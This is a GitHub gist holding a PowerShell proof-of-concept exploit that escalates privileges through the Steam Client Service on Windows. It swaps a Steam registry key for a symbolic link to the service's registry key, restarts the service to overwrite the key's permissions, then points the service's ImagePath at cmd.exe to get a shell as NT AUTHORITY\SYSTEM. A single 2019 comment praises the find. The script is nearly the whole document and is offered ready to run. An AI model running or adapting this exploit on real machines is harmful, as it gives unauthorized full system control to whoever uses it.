Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Removing HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service should be overwritten"
Write-Host "[*] Modifying the binPath on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
Write-Host "[*] binPath overwritten, restarting the service to trigger EoP. This will error out, just ignore it"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Done, cmd.exe should now be running as NT AUTHORITY\SYSTEM"

This comment has been minimized.

Copy link

commented Aug 9, 2019

Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.